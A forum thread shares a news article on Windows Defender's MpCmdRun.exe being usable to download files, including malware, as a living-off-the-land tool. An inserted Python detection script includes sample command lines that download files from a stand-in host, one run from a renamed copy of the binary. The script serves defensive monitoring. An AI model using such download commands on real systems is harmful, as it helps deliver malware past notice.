Windows 10's built-in antivirus can now be used to download viruses

Just sharing this with my fellow PHC members to keep us informed. Although it's not a big risk in case a perpetrator uses it, since you can always install a third-party antivirus.
For those saying Windows Defender is enough, you might as well reconsider.
This article was published by Paul Lilly, and the new feature was discovered by Mohammad Askar (a security penetration tester and instructor who has posted hundreds of security articles).

Kindly read below or click the link to see the article.



A recent update to Windows Defender gave it the ability to download files through a command line tool.

A recent update to the built-in antivirus software in Windows 10 has taught the program a new trick—how to download files through a command line tool, including nefarious ones (trojans, spyware, ransomware, and other malware).

Downloading malware is not the intended purpose, at least I presume that's not the case. But the new function could potentially be abused in such a manner. Fortunately, this is not something the typical home user needs to worry about, not unless they're a PC masochist (more on that in a moment).

This new ability was discovered by Mohammad Askar, a security penetration tester and instructor who has posted hundreds of security articles.

"Well, you can download a file from the internet using Windows Defender itself. In this example, I was able to download Cobalt Strike beacon using the binary 'MpCmdRun.exe' which is the 'Microsoft Malware Protection Command Line'," Askar stated on Twitter.

This effectively allows a local attacker to leverage Defender as what is called a living-off-the-land binary (LOLBin). That's when legitimate software is used for something malicious—in this case, using an antivirus program to download a virus.

It appears this new ability was added to Defender with the 4.18.2007.8 update in July, so the functionality has been there for nearly two months. Bleeping Computer tested the new download switch in the command line tool and was able to download the same WastedLocker ransomware that recently caused a ruckus with Garmin's infrastructure, which prompted the company to reportedly pay a multi-million dollar ransom.

This is not quite as careless as it may seem at first glance. For one, Defender will still scan files downloaded through this method, so in theory it should still protect against malware. And secondly, this would need to be initiated by a local user.

Nevertheless, this is something system administrators should be aware of, so they can take the proper precautions. It's not unheard of for a rogue employee to cause mischief, whether they are disgruntled, are on the verge of being fired, or any other reason.

-End-
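For the system administrators the article says should be aware of this, here is one way to spot the behaviour in process-creation logs, as an added example that is not part of the original post or article. It assumes Sysmon-style events exported as JSON lines and the `-DownloadFile`, `-url` and `-path` switches of MpCmdRun.exe, which the article does not name; the events, users and URLs are constructed.

```python
import json
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed events, one JSON object per line (field names follow Sysmon Event ID 1).
SAMPLE_EVENTS = r'''
{"User": "CORP\\svc-av", "Image": "C:\\Program Files\\Windows Defender\\MpCmdRun.exe", "OriginalFileName": "MpCmdRun.exe", "CommandLine": "MpCmdRun.exe -Scan -ScanType 1"}
{"User": "CORP\\jdoe", "Image": "C:\\Program Files\\Windows Defender\\MpCmdRun.exe", "OriginalFileName": "MpCmdRun.exe", "CommandLine": "MpCmdRun.exe -DownloadFile -url https://example.test/a.bin -path C:\\Users\\Public\\a.bin"}
{"User": "CORP\\jdoe", "Image": "C:\\Temp\\upd.exe", "OriginalFileName": "MpCmdRun.exe", "CommandLine": "upd.exe -downloadfile -URL \"http://example.test/b.dat\" -path \"C:\\Temp\\b.dat\""}
{"User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\curl.exe", "OriginalFileName": "curl.exe", "CommandLine": "curl.exe -O https://example.test/a.bin"}
'''

TARGET = "mpcmdrun.exe"
DOWNLOAD_RE = re.compile(r'(?<!\S)-downloadfile\b', re.I)
URL_RE = re.compile(r'(?<!\S)-url\s+("[^"]+"|\S+)', re.I)
PATH_RE = re.compile(r'(?<!\S)-path\s+("[^"]+"|\S+)', re.I)

def _arg(regex, cmdline):
    """Return the value following a switch, without surrounding quotes."""
    m = regex.search(cmdline)
    return m.group(1).strip('"') if m else None

def find_defender_downloads(lines):
    """Flag MpCmdRun.exe runs that use the download switch."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        image_name = basename(ev.get("Image", "")).lower()
        original = ev.get("OriginalFileName", "").lower()
        # OriginalFileName is read from the file's version resource,
        # so a renamed copy of the binary still matches.
        if TARGET not in (image_name, original):
            continue
        cmd = ev.get("CommandLine", "")
        if not DOWNLOAD_RE.search(cmd):
            continue
        findings.append({
            "user": ev.get("User"),
            "renamed": image_name != TARGET,
            "url": _arg(URL_RE, cmd),
            "dest": _arg(PATH_RE, cmd),
        })
    return findings

if __name__ == "__main__":
    for hit in find_defender_downloads(SAMPLE_EVENTS.splitlines()):
        print(hit)
```

Routine scans and other processes pass through untouched; only the two download invocations are reported, the second one marked as a renamed copy.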
 
Things are really complicated nowadays. That's why here at the office I went with Bitdefender. Endpoint security is still effective for non-IT users. Thanks for this, TS.
 
Thanks for the info. You really need to be careful when browsing the internet.
 